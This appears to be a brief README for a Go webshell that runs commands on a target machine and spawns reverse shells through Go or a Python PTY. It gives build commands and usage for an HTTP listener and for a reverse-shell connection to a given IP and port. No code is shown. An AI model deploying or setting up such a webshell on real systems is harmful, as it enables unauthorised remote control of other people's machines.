A simple webshell written in Go. Supports Windows and any Unix-like OS with The Bourne shell (sh).
Not a whole lot at the moment.
- Execute commands on the target machine
- Spawn a reverse shell (Go or Python PTY)
env GOOS=<OS> GOARCH=<ARCHITECTURE> go build shell.go
Running with no arguments will launch the HTTP server on 0.0.0.0:8080
./shell -ip <IP> -port <PORT>
- File Manager
- ???